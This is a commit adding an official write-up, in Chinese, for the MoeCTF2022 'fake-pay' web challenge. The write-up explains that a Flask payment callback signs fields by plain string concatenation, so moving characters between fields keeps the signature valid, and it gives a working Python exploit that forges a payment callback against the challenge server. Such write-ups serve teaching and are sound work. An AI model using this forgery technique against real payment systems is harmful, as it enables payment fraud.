add writeup for fake-pay

Author: frankli0324

Official_Writeup/Web/支付系统.md

@@ -0,0 +1,58 @@
+---
+date: 2022-10-31
+title: MoeCTF2022 支付系统 Writeup
+author: Frank
+---
+
+## 背景
+
+这是一道来历挺有意思的题：虽然碍于某些规定不能细说，但是确实是现实生活中出现的case简化而成的题目。
+本来希望做成有多层身份（用户、商户、平台、渠道等），多级目标的题目，但多次简化后发现问题根源单一且难度不大，遂出成了仅有单个身份（用户）以及单个目标（买flag）的MoeCTF的题目。
+
+总的来说是一道考验脑经急转弯的题目，但是对于新生而言，作为一道500分的题目，我对新生的期待至少有以下几点：
+
+* 掌握Python的基础语法
+* 掌握Flask框架的基础用法
+  * 如果能进一步了解orm的作用以及用法那就再好不过了，但要解出题目其实不需要
+* 能在一周时间左右耐心阅读完这段对于编写过一段时间代码的同学并不长的代码
+* 能通过代码准确判断出出题人的意图
+* 能通过逻辑分析对可能的攻击点进行分层次的排查
+
+## 思路
+
+首先阅读代码，这是基本功。我们看到 `/pay` 接口可以为我们充值，并且了解到用户是通过 `session` 进行标识的。  
+通过Flask框架的基础学习，不难了解到Flask的session在无法取得secret_key的情况下是无法篡改的，所以排除掉直接修改session中的余额这一思路。  
+发现 `/callback` 接口可以接受参数而***改变一笔订单的状态***，并利用 `sign` 参数对其它参数的值进行校验。仔细观察校验方式，可以发现校验的信息为简单的字符串拼接。  
+此时需要动脑：要绕过这一个校验无非有两种可能：
+
+* 伪造任意数据，并生成签名 `sign`。要达成这一目标我们需要 `secret_key`，但由于 `secret_key` 为随机生成，且没有泄露途径，这一方案可以排除
+* 伪造特定的数据，使伪造的数据与通过 `/pay` 接口产生的数据签名相同。
+
+不难发现我们应当采用第二种方式：
+
+在没有 `secret_key` 的情况下，思考如何构造两组签名相同的数据，在签名函数安全的前提下，不如思考如何构造两组数据，使得其在签名前的**数据本身**相同
+
+对于字符串拼接，我们可以发现：
+
+`aa+b == a+ab`
+
+脑经急转弯结束。
+
+## exploit
+
+```python
+from requests import session
+import re
+ses = session()
+loc = ses.get('http://fake-pay.moectf.challenge.ctf.show/pay', params={'amount': 2000, 'desc': ''}, allow_redirects=False).headers['location']
+detail = ses.get(f'http://fake-pay.moectf.challenge.ctf.show{loc}').text
+h = re.findall(r'[0-9a-f]{64}', detail)[0]
+u = re.findall(r'[0-9a-f]{8}-[0-9a-f\-]{27}', detail)[0]
+print(ses.post('http://fake-pay.moectf.challenge.ctf.show/callback', data={
+    'id': loc.split('=')[1],
+    'user': u, 'hash': h,
+    'amount': 200, 'status': 0,
+    'desc': '2',
+}).text)
+print(ses.get('http://fake-pay.moectf.challenge.ctf.show/flag').text)
+```